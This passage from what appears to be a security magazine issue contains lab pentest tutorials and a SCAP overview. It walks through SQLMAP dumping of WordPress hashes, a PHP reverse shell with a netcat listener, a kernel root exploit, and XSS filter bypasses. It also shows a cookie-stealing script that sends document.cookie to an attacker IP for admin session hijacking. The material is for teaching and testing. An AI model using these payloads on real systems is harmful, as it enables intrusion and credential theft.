all the data in most cases. Note that I am using * in the URI to provide another injection point
for SQLMAP and instructing it to skip injection in the Host header, as some websites
need a valid Host header. Use this at your own risk.
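The command itself was shown in a screenshot; a sketch of what such an aggressive invocation could look like (the exact path, the * injection point placement, and the --skip argument are assumptions):

```shell
# Maximum level/risk, an extra injection point marked with * in the URI,
# skip testing the Host header, answer prompts automatically, dump everything
sqlmap -u "http://vulnscripts/sqli.php/*?name=a" --level=5 --risk=3 --skip="host" --batch --dump-all
```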
SUMMARY
There are many tools to perform SQL injection, but SQLMAP is the best one available out there.
Mastering it will significantly reduce the total time required to pen test a web application.
Knowledge of the underlying techniques provides an extra advantage, as SQLMAP can then be
customized for your needs. This is THE tool that every security professional must know in order
to test for SQL injection.
Web Application Penetration Testing
by Gilles Lami
Web application penetration testing has become particularly important nowadays. Web
applications, if not well secured, can offer attackers numerous ways to penetrate
systems and networks, or ways to steal sensitive data, even without getting a shell
(command line) on the system. With the evolution of technologies, Web applications
have become more and more complex, using more and more components (the age of
using only basic HTML is over), so the attack surface is greater and the ways to attack these
systems are numerous. We can see the impact in the news, when a web application has
been compromised, personal or sensitive data has been stolen, and this information has
been made public.
Introduction
In this article, we will see a chain of exploits used against a vulnerable web server application and the web server
system itself. Ready? So let’s begin.
Usually, there are several phases during a penetration test. I will briefly describe the classical phases, as
they are not the core subject of this article, and then launch and describe the chain of exploits.
1. Reconnaissance
The goal of this phase is to gather a lot of information about the target, usually using "white" information
sources (i.e. information publicly available). We never get directly in touch with the target in this phase. For
instance, DNS records are used, social networks, etc.
The main goal of this step is to collect a lot of information that could be used in the further phases of the test. It
can be email addresses, employee names, job offers, etc. The information gathered can lead to possible guessable
logins, software names and versions used inside the company, even architectures in place.
2. Scanning
In this step, the target is solicited. Packets are sent to it and also received from it. In this phase,
vulnerabilities can be detected.
3. Gaining access
This phase speaks for itself. The target or network devices are penetrated by the use of one or several
vulnerabilities. Gaining access can also mean stealing information and data by circumventing
database access by means of a SQL injection flaw, for instance. In this case, we don't strictly speak
about gaining access directly on the server, but gaining access to the data.
4. Maintaining access
The goal of this phase is to demonstrate whether it is possible to maintain persistent access to
the target(s), and thereby have time to bounce deeper inside the tested networks.
5. Covering tracks
During this phase, the pentester will try to take appropriate measures to erase all his tracks (reset
logs, remove installed tools, etc.) that could prove that the systems have been compromised.
In the present article, phases 2 and 3 of the pentest will be presented. The test has been conducted in
a lab, so phase one is out of context and wouldn’t give useful results. At the end of the test, the “root”
account of the server will be compromised. Covering tracks with a root account is quite easy,
administration skills and tools knowledge are usually sufficient. And if system logs are sent
on-the-fly remotely to another server, then covering tracks of the attack can be much more difficult
to achieve and could be the purpose of another article.
In this lab, a vulnerable web server specifically built for pentesting purposes has been used:
Hackademic.RTB1.
Figure 1 - Vulnerable server used
The platform used to conduct the pentest is the famous Kali Linux distribution.
2. Finding a Wordpress access on the server and using it to upload a reverse shell.
3. Using the reverse shell to get command line access and retrieve the Linux version and kernel
version.
4. Using this information and the Wordpress server to upload a privilege escalation
program.
5. Using the reverse shell and a C compiler present on the server to compile the escalation
program.
6. Finally, getting "root" and then access to sensitive data on the server.
SQL Injection
An SQL Injection vulnerability is a vulnerability located at the application level (layer 7 of the OSI
model).
By browsing the web server, we can detect an SQL injection flaw by simply adding a special character
inside the URL. See in the picture below the apostrophe inside the URL, and also the result, showing
that there is an SQL error and that Wordpress is used.
Figure 2 - SQL Injection detected
We then use the sqlmap tool in order to get backend database information.
Below is the command launched:
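The screenshot of the command is not reproduced here; a plausible reconstruction, where the vulnerable parameter name "cat" is an assumption (the injectable URL is the one found in Figure 2, and the server IP appears later in the article):

```shell
# Enumerate the databases behind the injectable parameter on the Hackademic target
sqlmap -u "http://192.168.0.35/Hackademic_RTB1/?cat=1" --dbs
```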
Figure 4 - Sqlmap exploitation 2
As we can see, there are three databases we can try to exploit. We will choose the Wordpress
database. Again with sqlmap:
The results:
Figure 6 - Sqlmap exploitation 4
We then dump the content of the wp_users table, columns user_level, user_login and user_pass:
-C user_level,user_login,user_pass --dump
Sqlmap automatically found password hashes and proposed to perform a dictionary attack. We
indicate a password dictionary file (a file with a list of passwords, easily downloadable from the
Internet) and launch the attack.
We found several accounts, including the account "GeorgeMiller" with a level of 10.
This level means administrator rights in Wordpress.
We know that the web application hosts Wordpress, and we have an administrator account and
password. We will now locate the Wordpress login page. We could try different ways, but in this
article, we will use "dirbuster". This tool, also part of the Kali Linux distribution, is powerful for
brute forcing web server directories and file names.
Figure 9 – Dirbuster
We succeeded in finding the Wordpress login page. See below.
With the Wordpress login page identified, and with a cracked user account, we are now able to
connect inside Wordpress.
Inside the Wordpress administration portal, we configure Wordpress to allow upload of “c” and
“php” files:
Figure 12- Wordpress admin configuration
We are now able to upload files. We will upload a "reverse php webshell" to penetrate the web
server and get a command line.
The PHP reverse shell is configured to connect back to the pentester attack machine on the TCP port
443 (see figure below.)
This port is usually allowed by firewalls from the Internet to the web server, but also sometimes
(quite often) from the web server or the internal networks to the Internet, because TCP
port 443 is the default HTTPS port.
On the attacker’s machine, we start a listener on TCP port 443 in order to be able to accept the reverse
connection. To achieve this in a simple way, we use the “netcat” (“nc”) tool:
Figure 16 – Netcat
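The netcat invocation from the figure is, in typical traditional-netcat syntax (whether the -p flag is needed depends on the netcat variant installed):

```shell
# Listen verbosely on TCP 443 and wait for the reverse shell to connect back
nc -lvp 443
```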
Then we click on the upload button in the Wordpress administration page (see above.)
The file is uploaded and we also see where it is located on the web server:
“/Hackademic_RTB1/wp-content/phpreverseshell.php”
http://192.168.0.35/Hackademic_RTB1/wp-content/phpreverseshell.php
A simple command “id” tells us that we are logged in as “apache”. This user has very few rights so we
have to escalate our privileges. The banner shows us that the victim machine runs under Linux 2.6.31.
Inside our Kali machine, we search for an exploit to escalate our privileges.
Figure 19- searchsploit - privilege escalation
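On Kali, the local Exploit-DB copy can be queried with searchsploit; a sketch of such a query (the exact search terms used in the figure are not reproduced):

```shell
# Search the local Exploit-DB mirror for exploits matching the victim's kernel version
searchsploit linux kernel 2.6.31
```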
We find a program, written in the C language, able to escalate our privileges on the machine. Using
Wordpress, we upload it to the victim's machine. We then return to our command line shell
inside the web server and perform a "cat /etc/passwd" to retrieve the location of the web
server's root directory:
We go into /var/www and then to the location of our “15285.c” program (same sub-location as our
php reverse shell).
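Compiling the uploaded exploit with the server's own compiler could look like this (the filename 15285.c comes from the article; the output binary name is arbitrary):

```shell
# Compile the privilege-escalation exploit with the gcc present on the victim
gcc 15285.c -o exploit
```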
We now run it and finally get the root account:
Conclusion
If some basic security measures had been in place, for instance, if the Linux server system had been
correctly patched, if the web application had been audited (following the OWASP methodology, for
instance), if the Wordpress admin password had been hardened, if the Wordpress software was not
reachable from the outside, and finally, if TCP port 443 was not allowed from the web server to the
Internet, then the exploit would have been much more difficult to achieve.
We could also think that if the first entry point (SQL injection) was not possible then the entire
exploit would have rapidly failed. However, one of the goals of this article was to show a chain of
exploits, and show why it is important to have good security habits and fix as many security flaws as
you can, as soon as possible.
ABOUT THE AUTHOR:
Web applications in
the modern world
by Hashem Ahmad
Today, many of our life's actions happen online: different kinds of shopping, Internet banking
and financial transactions, social communication with our friends, TV shows, and a lot
of universities are uploading their academic courses to the web. Examples are
numerous, and the number of companies whose existence relies totally on web
applications is increasing every day; Facebook, Twitter, Ebay, Uber and many, many
more companies are nothing but a web application. That's why the market today is
paying close attention to protecting web applications and the underlying infrastructure,
because it's not just about temporary service interruption or data leakage; for some
companies, an exploited vulnerability in their application could put them totally
out of business.
Before we start talking about this article’s main topic, let’s have a brief introduction about the Web.
The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative,
hypermedia information systems. It is a generic, stateless, object-oriented protocol which can be used for many
tasks, such as name servers and distributed object management systems, through extension of its request
methods.1
It was first used in 1990, as HTTP version 0.9. Version 1.0 was defined in IETF RFC 1945, and then version 1.1 in 1997.
HTTP version 2.0 was published in 2015, in RFC 7540.2
To keep it short, HTTP is the basic engine of the web and it consists of a series of:
• Requests sent from the client to the web application/server
• Responses back from the server to client
HTTP Request:
When you open your web browser (client) and ask for a website, your browser sends an HTTP request to the
server with the following items:
1. HTTP Method: defines what the client needs
2. Host: the domain you are trying to access
3. Resource: the page under this domain that you are requesting
4. Version: HTTP version
5. Other optional headers such as client version, language
HTTP Response:
When the client sends a request to the server, the server responds back with an HTTP response. The
first line of this response is a status code, when the client reads this code, it understands how to
handle the remaining received data. The following are the most common status codes:
• 200 OK: Request processed successfully
• 404 Not found: Requested resource was not found
• 500 Internal Server error
In general, 1xx codes are informational, 2xx indicates success, 3xx for redirection, 4xx client side
error, and 5xx server side error.
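The grouping by first digit can be captured in a tiny shell helper (a sketch; the labels follow the summary above):

```shell
# Map an HTTP status code to its class, based on the first digit
classify_status() {
  case "$1" in
    1*) echo "informational" ;;
    2*) echo "success" ;;
    3*) echo "redirection" ;;
    4*) echo "client error" ;;
    5*) echo "server error" ;;
    *)  echo "unknown" ;;
  esac
}

classify_status 200   # success
classify_status 404   # client error
```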
HTML is the language used to create web pages: basically text files that can be rendered by a web
browser and translated into graphical content. HTML tags are the building blocks of a web page or
an application; when a browser gets the HTTP response, it interprets the tags, whose functions it
already understands, and translates them into visual content.
You can view a sample of any page by viewing its source, and see a lot more tags.
JavaScript
Building a website using only HTML tags could be very tedious work, and will not provide you with
all the fine-grained functionality offered by other technologies, like CSS and JavaScript.
JS is an interpreted programming language, supported by all modern web browsers, and it has become
an essential component of modern web technology.
Cookies
These are small pieces of data exchanged between a web client and a server, making the server
capable of differentiating between its clients. When a client connects to a web server, the server
assigns each client its own unique cookie, even if two users sharing the same public IP address are
requesting the same web page.
There are many attributes in a cookie: Name, Value, Domain, Expiry date and time, HTTPOnly flag,
Secure flag.
In 2013, Cross-Site Scripting (XSS) was identified as number three in the OWASP Top 10 web
application security risks.34
Selection methodology for this list is based on the likelihood of the application having a vulnerability,
likelihood of it being discovered, likelihood of it being exploited, and the technical impact if
exploited. This gives us an indication about how important and how risky it is to find an XSS
vulnerability in your application.
XSS vulnerabilities exist when the user supplies input to the application. If this input is not validated
(sanitized) by the server, and if it contains malicious characters, as we will see, then it may eventually
be stored (injected) in the page code, and further reflected to other legitimate users when they
request the same web page.
the HTTP request itself sent by the victim to the server.
When the victim clicks on the link, the malicious HTTP request is sent to the
vulnerable server, reflected back on the browser, and executed by the browser.
Although XSS vulnerabilities exist in the web application, most of the time an attacker uses XSS to
target the victims (legitimate users), not the application itself. It can result in session
hijacking, user redirection, browser hijacking, and, of course, web site defacement.
A third type of XSS attack is the Document Object Model (DOM) based attack. This kind of XSS
does not change anything in the web application/server itself as in the previous two types,
and the payload is not seen in the response; rather, it exploits the HTML document's DOM at the
client side due to inappropriate handling of the data in the associated DOM.
XSS Detection
Now let's have a look at XSS detection. A web site's XSS vulnerability can be tested in any input field
on the page (search field, insert comment field, etc.), or by testing URL parameters. Mainly, you test
by injecting a JavaScript tag; if there is a vulnerability in this input field or URL, your tag will get
injected into the page HTML source code and will be executed successfully. If the script is not
executed, you can check why it failed by viewing the new page source.
In this section, we are going to test URL parameters using the pentesterlab.com vulnerable-by-design
application called "Web for Pentester"; many thanks to Louis Nyffenegger for providing this great
effort.
When you open the 1st exercise, you will find a part in the URL that says:
Example1.php?name=hacker
Hello hacker
This means that the value part (hacker) of the parameter (name) in the URL, is reflected in the page
body, so we will try to inject our JavaScript in the parameter value, but let’s have a quick look at the
page HTML source code before injecting any JS code:
At the end of the code, you can see the word “Hello hacker” in the body, then the closing body and
html tags are there without any JS tags. Now let’s start testing and injecting JS tags in the URL:
As you can see, I removed the value "hacker" from the URL; instead, I typed
<script>alert(“vulnerable”)</script>
When I hit enter, the script ran successfully, and a JavaScript alert popped up with the word I typed
in my injected code, "vulnerable". This indicates that this parameter value in the URL is passed to
the application without any sanitization/filtering; thus, it's vulnerable to XSS attacks. Let's
have a look at the source code after injection to see what has happened:
The script tags are clearly inserted in the page successfully.
In the second example, I tried the same tag <script>alert(“vulnerable”)</script> but no alert popped
up this time; instead, the body became Hello (“vulnerable”). Our guess is that the application filtered
out the <script> and </script> tags, so we have to look at the code and check the failure reason:
Now it’s confirmed that the app sanitized <script> tags, but what if we try to capitalize some letters
in <script> tag? Let’s try to modify our injected value and make it
<sCriPt>alert(1)</ScRipt>
Aha! The script passed. This verifies that the application is filtering for the specific tags <script> and
</script> written in lower case; when we changed some letters in the tags, the payload passed
successfully, and we can verify it from the page source after injection:
<sCriPt> and </ScRipt> tags were injected and executed successfully; the browser acted as if
they were written normally in lower case. This leads us to a new fact: HTML tags are NOT case
sensitive to the browser.
In our third example, I tried both techniques, but they failed, and the word alert(1) is reflected in the
body. The application seems to be filtering out script tags no matter what the letters' case is, so we
need to find another trick:
As you see, I split the word alert(1) into two parts, the first part is
al
which is inserted before the opening <script> tag, and the second part:
ert(1)
Inserted after the opening <script> tag, as you can see the word alert(1) was reassembled back
together into a single word in the body. So we try to split a secondary <script> tag into two
parts, the first part placed before the opening script tag and the second part after it, and we repeat
the same thing for the closing </script> tag at the end. The inner tags are filtered out by the
application, and the remaining characters of the parameter value are put together into a single word,
injected in the page, as verified in the source:
There are many methods to detect XSS vulnerabilities, not only using the <script> tag; when you find
that the word 'script' is blocked, you can try any other HTML tag, such as <a>, <img>, or <div>:
Here I used the <a> tag with the 'onclick' event, where the alert appears when you click the link:
<a onclick='alert(1)'>click to show the alert</a>
Feel free to play around with any other tag. Check the page source before and after injection:
In the 5th example, the script tags are injected successfully, but the application filters for the word
alert, even when inserted without any tags. So you have to find a way to encode the letters
'a l e r t' to pass the filter.
The JS function String.fromCharCode() takes Unicode values as input and returns the corresponding
characters. For example, String.fromCharCode(97) returns the letter ‘a’, so the word alert is
translated into:
String.fromCharCode(97,108,101,114,116)
In order to execute it, we have to use another JS function, eval(), which evaluates a string as JS
code. Encoding the whole expression alert(1) (40, 49 and 41 are the codes for '(', '1' and ')'), it
becomes:
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
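You can verify the character codes from the command line; a quick check using awk, which prints the character for each decimal code:

```shell
# Decode 97,108,101,114,116,40,49,41 back into the string "alert(1)"
awk 'BEGIN {
  n = split("97 108 101 114 116 40 49 41", codes, " ")
  s = ""
  for (i = 1; i <= n; i++) s = s sprintf("%c", codes[i] + 0)
  print s
}'
```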
Let’s have a look at the page source:
In the next example, after the Hello word in the page source, there is already a JS script, which seems
to take the value of the 'name' parameter in the URL and assign it to a variable named 'a'.
Try to change the value 'hacker' in the URL, and see that this value gets reflected in the page source;
a value of x in the URL will look like this in the source:
<script>
var $a= “x”;
</script>
An easy way to explain what the script actually writes in the source code is as follows: the script
declares a new variable:
a=”
It waits for you to add the value, then it adds “;
This means that we need to insert our script instead of this x, which will leave an extra “; at the
end, which can easily be commented out using //
Here is what we are going to do; let’s imagine that the script is writing its code, and the cursor wrote
var $a= “
The cursor is now blinking waiting for our input to be written, then it will add the final “;
Here we can add our script, let’s add our own “ in the payload
The script is now var$a = “ “ still waiting to add the final “; at the end
Let’s close the script that’s already there, so the payload becomes “</script>
<script> var $a= “ “ </script> “; </script>
XSS exploitation
Now that you have detected an XSS vulnerability in the application, whether by testing a URL or a
user input field, it's time to exploit it. In this demo, we will also use Louis's application: 'XSS and
MySQL FILE'.
When you first browse the application, you will find the following welcome page. Click the 'comment' link:
Try injecting anything, and you will find that there isn't any sanitization in this comment input field. This was done on purpose: this is an exploitation exercise, not a detection one, so there is no need to waste time identifying the kind of filtering in the application.
As Louis mentioned in the official explanation, the image is configured so that there is a virtual
administrator for the application, who is already logged into the app, and browsing app pages every
few seconds automatically.
So, what we need to do is inject a script which captures a user's cookie when he browses the exploited page, and sends that cookie to the attacker's IP address. Pay close attention to the IP addresses used here: the application's IP address is 192.168.153.129, which is also the admin's IP address. The attacker's IP address, 192.168.153.131, is the one we are going to inject; the cookie value will be sent to this last address.
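A cookie-stealing payload of this shape can be sketched as follows (the helper name exfilUrl is illustrative; only the IP address comes from the lab setup):

```javascript
// In the victim's browser, the injected script would do something like:
//   new Image().src = 'http://192.168.153.131/' + document.cookie;
// i.e. request a fake "image" whose URL path carries the victim's cookie.
function exfilUrl(cookie) {
  return 'http://192.168.153.131/' + cookie;
}
console.log(exfilUrl('PHPSESSID=abc123'));
// http://192.168.153.131/PHPSESSID=abc123
```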
The injected script then tries to load an image supposedly located at 192.168.153.131/document.cookie, or in other words at
http://attacker'sMachine/victim'sCookie
So when the admin loads this page, the script runs and tries to fetch this image, sending the admin's cookie value to us in the HTTP request. The last part is to run a listener on the attacker's machine and capture any traffic coming in on port 80. Use whatever listener you like; netcat is the easiest:
netcat -l 80
but this closes after the first connection. It will work, but you can use socat to keep the listener active, for example:
socat TCP-LISTEN:80,fork,reuseaddr -
Save the captured cookie value in your own browser (for instance via the browser's developer tools), then browse to 192.168.153.129/admin and see that you are now the application admin, able to edit or delete posts as the administrator:
Although manual methods and whitelists can protect you, they are not the optimal solution. It is better to protect your applications using escaping techniques, as discussed in the OWASP XSS prevention cheat sheet [5]. You can use auto-sanitization libraries like AntiSamy, or deploy a Web Application Firewall (WAF).
• The same escaping technique should be applied, as mentioned before, anywhere you expect untrusted data. In addition to HTML escaping, there is URL escaping, for when you have parameters in the URL with values like those illustrated in previous examples:
• Example1.php?name=hacker
• Except for alphanumeric characters, escape all characters with ASCII values less than 256 using the %HH escaping format.
• For HTML attribute values, except for alphanumeric characters, escape all characters with ASCII values less than 256 using the &#xHH; format (where HH is the hex value of the character).
• Sanitization should also be taken care of in dynamically created JavaScript code: except for alphanumeric characters, escape all characters with ASCII values less than 256 using the \xHH format.
• CSS is also subject to attacks: except for alphanumeric characters, escape all characters with ASCII values less than 256 using the \HH escaping format.
• Use a library like HtmlSanitizer [6], designed to parse HTML and sanitize tags, if your input field is expected to accept HTML tags: for example, the comments field of a forum about learning HTML, where people legitimately post comments containing HTML tags.
For this demo, I'm going to use 192.168.153.1 as my source IP address, and any value for the port. Then press the 'Start' button.
Then configure the URL:
http://192.168.153.128/xss/example1.php?name=[X]
You have to replace the parameter value under test with [X].
Then select an appropriate time interval (the pause between payloads) and start fuzzing. Don't make the interval too high, so the scan stays quick, but not too low either, so you have time to see the payloads and the reflected results.
Xenotix will keep sending GET requests to the configured URL, by replacing [X] with the
payloads in the list one by one. The payload appears in the background, and if it detects a
vulnerability, you will see the result.
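This substitution loop is easy to picture. The sketch below is not Xenotix's actual code, just the idea, with the template URL taken from this demo and a few illustrative payloads:

```javascript
// Replace the [X] marker with each payload in turn, producing the GET
// URLs the fuzzer would request one by one.
const template = 'http://192.168.153.128/xss/example1.php?name=[X]';
const payloads = [
  '<script>alert(1)</script>',
  '"><script>alert(1)</script>',
  "'><script>alert(1)</script>",
];
const requests = payloads.map(p => template.replace('[X]', encodeURIComponent(p)));
requests.forEach(u => console.log(u));
```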
As you can see, the alert box appeared, a vulnerability was detected using the 3rd payload in the list,
and the payload that detected the vulnerability is:
’><script>alert(1)</script>
You have to know which input field you need to test, and what the action of the POST request is. Go to the above webpage and view the source:
What we need to test in this demo is the comment box, whose name is 'text'; the action associated with this POST request is /post_comment.php?id=2
Now let's go to Xenotix, press the Scanner button, select the POST request fuzzer, and configure it with the following:
URL: in the form http://IP/POST_ACTION: http://192.168.153.129/post_comment.php?id=2
Parameters: input field name: text=[X]
Adjust an appropriate Time interval, start fuzzing and see the payloads changing until you see
success:
A vulnerability was detected using the payload '><script>alert(1)</script>
is not associated with a known attack.
• The beauty of a WAF is that, in addition to signature and anomaly detection, it understands the application logic while in learning mode, and then raises flags according to what it has learned. Examples: illegal entry point detection, login page bypass, illegal language, illegal file upload, illegal file request, disallowed locations/countries, and exceeding the maximum number of violations from the same user (IP/session) within the configured time window, etc.
• Aside from the above mentioned protection mechanisms, a WAF also provides you
with other features, like SSL offload, web compression, and load balancing.
• One of the most common WAFs on the market is ModSecurity, an open-source WAF for Apache. F5 and Imperva are considered the market leaders in this space.
Summary
XSS attacks are very common nowadays; they can exist in any user input field (search fields, comment fields, etc.) and can result in serious data theft.
It's important to treat all input as untrusted, potentially malicious data and to sanitize it. Although manual methods and whitelists can protect you, they are not the optimal solution. It's better to protect your applications using escaping techniques, as discussed in the OWASP XSS prevention cheat sheet [8]. Use auto-sanitization libraries like AntiSamy, or deploy a Web Application Firewall (WAF), and don't forget to use an XSS detection framework like Xenotix to attack yourself first, before others do!
ABOUT THE AUTHOR:
REFERENCES:
2. https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
3. https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013
5. https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
6. https://github.com/mganss/HtmlSanitizer
7. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
8. https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Understanding SCAP
Through a Simple Use
Case
by Alexandre D’Hondt & Hussein Bahmad
I. INTRODUCTION
Today, complying with an organization's security requirements is no easy job for security engineers, due to the large variety of systems and software products. Beyond efficiently configuring, patching and monitoring IT assets, compliance with the organization's security requirements has to be guaranteed without overwhelming the IT security personnel. Moreover, in recent years, with the emergence of new security vendors, each often spending effort on creating its own nomenclature for vulnerabilities, a variety of solutions and tools were developed. To gain efficiency, the resulting security items have to be shared among industries to save costs, and therefore a solution is needed to exchange these items in a standardized fashion. That is why, in the early 2000s, the National Institute of Standards and Technology undertook to specify the Security Content Automation Protocol, in order to standardize security activities and overcome the lack of interoperability between existing solutions. Furthermore, SCAP also provides a simple way to perform security reporting and to demonstrate compliance.
The remainder of this review is structured as follows. In section II, SCAP is presented, starting with its origin and purpose, then its specification. Two of its main components are presented in a little more detail and some use cases are mentioned. In section III, a simple practical use case is discussed to illustrate the content of section II, using a command-line tool from the OpenSCAP project, in particular for some basic secure-configuration compliance checks. Section IV concludes this review of SCAP with some ways ahead.
II. WHAT IS SCAP?
SCAP [1] is, first of all, an effort by the US Department of Commerce, through NIST, since the early 2000s, to standardize the format in which security content is communicated within the industry. The main purpose is to give everybody the same vocabulary for compliance with major standards such as ISO/IEC 27001 (an international standard specifying requirements in the field of information security management), DoD Directive 8500 (the Department of Defense's directive for information assurance requirements) and the Federal Information System Controls Audit Manual (FISCAM). But its purpose is broader, and SCAP can also be used for more specialized technical security activities such as digital forensics. Such standardization allows security experts to exchange information, but also helps achieve an underlying goal considered the Holy Grail of information security management: security automation. [2] [3]
This section first explains the specification of SCAP and its components. It then gives some
interesting use cases and success stories. It finally gives a few more details about two of SCAP’s
components, OVAL and XCCDF, which are the languages targeted by the simple use case described
in the next section.
A. A suite of specifications
SCAP is a suite of specifications that standardizes the format and nomenclature by which security software products communicate information about software identification, software flaws, and security configurations [4]. The SCAP specification, denoting the representation, must be distinguished from the SCAP content, which denotes the data shared across the information security community and hosted in various databases across the world, e.g. the National Vulnerability Database (NVD) [5].
Note that the enumerations, centralized in the SCAP content, ensure that what is defined by the languages can refer to standardized data.
Figure 1. SCAP standard
Figure 1 depicts an overview of the specification, starting on the left vertical frame with the very first version, SCAP 1.0, then representing on the middle frame the additional components of the current version, SCAP 1.2, and then showing on the right frame the components still to be developed in further versions. The three categories encompass the components in the horizontal frames.
Version 1.0 consists of the base components for automating security controls. Together, these components form a set of independent specifications in XML format for expressing information security knowledge in a standardized way. The languages give meaning to the information in the context of the systems to be checked. The enumerations contain the information about platforms, configurations and vulnerabilities. The measurement and scoring systems allow ranking the results of the tests and prioritizing remediation. The base components are the following:
• XCCDF: Extensible Configuration Checklist Description Format, a language for writing security checklists and benchmarks.
• OVAL: Open Vulnerability and Assessment Language, a language for specifying machine-readable system tests.
• CPE: Common Platform Enumeration, a nomenclature for IT platforms.
• CCE: Common Configuration Enumeration, a nomenclature for system configuration issues.
• CVE: Common Vulnerabilities and Exposures, a nomenclature for publicly known vulnerabilities.
• CVSS: Common Vulnerability Scoring System, a system for scoring the severity of vulnerabilities.
Figure 2. SCAP 1.0 workflow
Figure 2 depicts the workflow of the SCAP 1.0 components using a tool that implements the specification. Such a tool can be an open-source solution such as OpenSCAP's oscap [6] or a commercial solution such as Arellia Security Analysis [7]. Concretely, the tool takes as input an XML file written in XCCDF, with references to CPE, CCE, CVE and CVSS items and, possibly, links to OVAL definitions. It then outputs an XML file from which an HTML report or guide can be generated with the same tool. The resulting HTML report highlights the compliance-checking results, whereas the HTML guide fully describes the compliance-checking rules with the related metadata (without performing any test).
Version 1.2 essentially consists of an extension of the languages to provide standardized reporting. It also extends the scoring systems to configuration items. The additional components are the following:
• OCIL: Open Checklist Interactive Language is a language for representing checks that collect information from people or from existing data stores populated by other data collection efforts.
• ARF: Asset Reporting Format is a format for expressing the transport format of information about assets and the relationships between assets and reports.
• AI: Asset Identification is a format for uniquely identifying assets based on known identifiers and/or known information about the assets.
• CCSS: Common Configuration Scoring System is a system for measuring the relative severity of system security configuration issues.
Future versions of SCAP will extend version 1.2 with emerging specifications intended to complement the already-covered ones, in order to automate more tasks such as remediation (note that, at this moment, the data related to remediation exists but is not yet exploited for automation, because it's not ready for production). These specifications will become part of the NIST validation program and should be made available after this process. Some emerging specifications are the following:
• OCRL: Open Checklist Reporting Language is a language for writing XML definitions that gather system information into standardized reports for policy compliance.
• CRE: Common Remediation Enumeration is a nomenclature for remediation activities.
• ERI: Extended Remediation Information is a collection of information, in addition to the CRE, supporting organizations' remediation activities.
• CMSS: Common Misuse Scoring System is a system for measuring the characteristics of software feature misuse vulnerabilities.
SCAP was developed to address a large part of information security management concerns in an automated way. These concerns relate to the main activities providing control over information technologies. The interested reader can refer to the CIS Security Controls for a complete list [8]. The main use cases, with their related security control questions, are the following:
Up to now, several studies have been conducted in the field of automating these use cases. From building a service-oriented architecture for vulnerability assessment systems [9], or modelling network attacks using vulnerability information [10], to developing configuration check tools [11] [12] or designing security into mobile devices [13], SCAP is more and more widely adopted. Moreover, as information technology security becomes a top priority for most organizations, audit and monitoring [14] [15] increasingly rely on SCAP.
As stated in section II-A, XCCDF is a specification language that allows us to define checklists. Together, these form a benchmark for a given platform. Each checklist consists of a set of logically grouped rules. XCCDF syntax is based on XML and is structured according to an XML schema. An XCCDF rule is a high-level definition which is translated into a check on the related system (identified by its platform identifier, referring to a CPE). In fact, the rules are not specified directly inside the XML file; instead, they point to other XML documents referred to as OVAL definition files.
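A minimal sketch of such a rule follows; all identifiers and file names here are illustrative, not taken from a real benchmark:

```xml
<Benchmark xmlns="http://checklists.nist.gov/xccdf/1.2"
           id="xccdf_example_benchmark_pwpolicy">
  <Group id="xccdf_example_group_passwords">
    <Rule id="xccdf_example_rule_no-empty-passwords" severity="high">
      <title>Disallow empty passwords</title>
      <!-- The actual check logic lives in a separate OVAL definition file -->
      <check system="http://oval.mitre.org/XMLSchema/oval-definitions-5">
        <check-content-ref href="pwpolicy-oval.xml" name="oval:example:def:1"/>
      </check>
    </Rule>
  </Group>
</Benchmark>
```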
Figure 3. XCCDF (left) and OVAL (right) XML trees (not exhaustive).
In Figure 3, the left tree represents the main part of the XML tree of an XCCDF benchmark. We notice the benchmark root with multiple group child nodes, themselves having multiple rule child nodes. These rules may contain references to OVAL definitions.
XCCDF can also deal with the Script Check Engine (SCE), a small and simple check engine that allows reusing legacy home-made check scripts written in another language; these scripts can be mixed with OVAL definitions, as illustrated in Figure 4. The currently supported languages are Bash, Python, Perl and Ruby.
Figure 4. Mix of an OVAL definition and a Python script in an XCCDF file.
Note that XCCDF rule definitions also include fix items, which are simple and straightforward remediations for misconfigurations of the tested configuration items. The aware reader may have noticed that remediations should be handled in a future version of SCAP, as stated in Figure 1; that is, CRE should provide a specific definition in a dictionary of remediations that could be referenced in the XCCDF rules instead of hard-coding them.
As also stated in section II-A, OVAL is a specification language that allows us to define tests. An OVAL definition consists of multiple tests referring to objects (e.g. a file name, a registry key) and states (e.g. a file's MD5 hash, a registry key's value).
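A heavily abridged sketch of how a test, an object and a state relate inside an OVAL definitions file; the IDs are illustrative, the element names follow OVAL's independent filehash family, and the exact schema details should be treated as an assumption:

```xml
<!-- Test: the object (a file) must match the state (an expected hash) -->
<ind:filehash58_test id="oval:example:tst:1" check="all"
    comment="system-auth matches the approved baseline">
  <ind:object object_ref="oval:example:obj:1"/>
  <ind:state state_ref="oval:example:ste:1"/>
</ind:filehash58_test>

<!-- Object: which file, and which hash algorithm to collect -->
<ind:filehash58_object id="oval:example:obj:1">
  <ind:filepath>/etc/pam.d/system-auth</ind:filepath>
  <ind:hash_type>MD5</ind:hash_type>
</ind:filehash58_object>

<!-- State: the expected value (placeholder hash) -->
<ind:filehash58_state id="oval:example:ste:1">
  <ind:hash>d41d8cd98f00b204e9800998ecf8427e</ind:hash>
</ind:filehash58_state>
```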
In Figure 3, the right tree represents the main part of the XML tree of an OVAL definition. We notice the oval_definitions root with multiple definition, test, object and state child nodes. These are logically structured as depicted in Figure 5; that is, they point to each other to provide a meaning that matches this representation.
Both XCCDF and OVAL have their own online repositories [5] [16] with shared SCAP content, in order to provide community-developed benchmarks as well as vulnerability, compliance, inventory and patch definitions for a set of supported operating systems.
III. A SIMPLE USE CASE
This section presents a simple use case for the sake of better understanding SCAP. First, we state the
problem and the scope of the use case. Then, we discuss a solution without SCAP and its caveats.
Afterwards, we discuss a solution with SCAP, explaining the workflow of its involved components.
Finally, we argue the added value of such a solution.
A. Problem setting
1. Password Files
3. Expiration Parameters
B. Manual solution
We can imagine that, without SCAP, such assessments would be done manually, using other resources; e.g., a company may hire employees to fulfil these needs. However, there could also exist internal implementations with specific languages, enumerations and metrics to automate the testing activities, requiring just a few experts to manage the automated execution. This is precisely a case mentioned in the introduction of this review, showing a lack of interoperability that SCAP can overcome.
